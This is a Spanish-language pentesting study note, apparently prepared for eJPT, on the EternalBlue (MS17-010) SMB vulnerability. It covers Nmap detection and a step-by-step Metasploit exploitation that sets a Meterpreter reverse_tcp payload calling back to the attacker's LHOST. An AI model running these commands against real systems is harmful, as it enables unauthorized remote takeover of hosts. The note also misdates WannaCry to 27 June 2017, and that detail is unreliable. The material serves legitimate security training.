> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/ataques-basados-en-sistema-host/windows/explotacion-de-vulnerabilidades-de-windows/explotacion-de-la-vulnerabilidad-smb-ms17-010-de-windows-eternalblue.md).

# Explotación de la vulnerabilidad SMB MS17-010 de Windows (EternalBlue)

### 🧠 ¿Qué es EternalBlue?

* **EternalBlue** (MS17-010 / CVE-2017-0144) es el nombre que se le da a un conjunto de vulnerabilidades y exploits para sistemas **Windows** que permiten a un atacante **ejecutar código de forma remota** y obtener acceso a un sistema Windows, comprometiendo así toda la red a la que pertenece.
* El exploit **EternalBlue** fue desarrollado originalmente por la **NSA (National Security Agency)** y fue filtrado públicamente en 2017 por un grupo de hackers conocido como **Shadow Brokers**.
* El exploit aprovecha una **vulnerabilidad en el protocolo SMBv1** de Windows, permitiendo el envío de paquetes especialmente diseñados que facilitan la ejecución arbitraria de comandos.

***

### 🦠 EternalBlue en ataques reales

* EternalBlue fue utilizado en el ataque de **ransomware WannaCry**, el **27 de junio de 2017**, para explotar sistemas Windows y propagarse automáticamente a través de redes, afectando a miles de sistemas en todo el mundo.

***

### 💻 Versiones de Windows afectadas

* Windows Vista
* Windows 7
* Windows Server 2008
* Windows 8.1
* Windows Server 2012
* Windows 10
* Windows Server 2016

***

### 🔒 Parche de seguridad

* Microsoft lanzó un **parche para MS17-010 en marzo de 2017**. Sin embargo, muchos sistemas aún no han sido actualizados, quedando vulnerables al exploit.

***

### 🛠️ Uso de Metasploit Framework (MSF)

* **Metasploit** incluye un módulo auxiliar para verificar si un sistema es vulnerable a MS17-010.
* También dispone de un **módulo de explotación** para comprometer sistemas que no han sido parcheados.
* Al explotarlo con éxito, se obtiene una sesión **meterpreter privilegiada** en el sistema víctima.
* Además de MSF, existen scripts públicos para explotación manual.

***

### 🧰 Herramientas y entorno

* **AutoBlue-MS17-010:**\
  <https://github.com/3ndG4me/AutoBlue-MS17-010>
* **Sistema objetivo:**\
  Windows Server 2008 R2
* **Distribución para pentesting:**\
  Kali Linux

***

### 🔍 Cómo detectar la vulnerabilidad con Nmap

Para detectar si un sistema es vulnerable a MS17-010 usando Nmap, puedes utilizar el siguiente comando con un script NSE específico:

```bash
nmap -p445 --script smb-vuln-ms17-010 <IP-objetivo>
```

* Este script intentará detectar si el sistema objetivo es vulnerable enviando solicitudes SMB específicas por el puerto 445 (SMB).
* Si el sistema es vulnerable, verás un mensaje similar a:

```
VULNERABLE:
  MS17-010: EternalBlue
  State: VULNERABLE
  IDs: CVE:CVE-2017-0143,CVE-2017-0144,...
```

***

### 💣 Cómo explotarlo con Metasploit

1. **Iniciar Metasploit Framework:**

   ```bash
   msfconsole
   ```
2. **Buscar y usar el módulo de EternalBlue:**

   ```bash
   use exploit/windows/smb/ms17_010_eternalblue
   ```
3. **Configurar los parámetros:**

   ```bash
   set RHOST <IP-objetivo>
   set PAYLOAD windows/x64/meterpreter/reverse_tcp
   set LHOST <tu-IP>
   run
   ```
4. **Si el exploit tiene éxito, obtendrás una sesión Meterpreter en el sistema:**

   ```
   meterpreter >
   ```

> ⚠️ **Nota:** Este módulo puede ser inestable. También puedes usar el módulo `auxiliary/scanner/smb/smb_ms17_010` para solo verificar la vulnerabilidad sin explotarla.
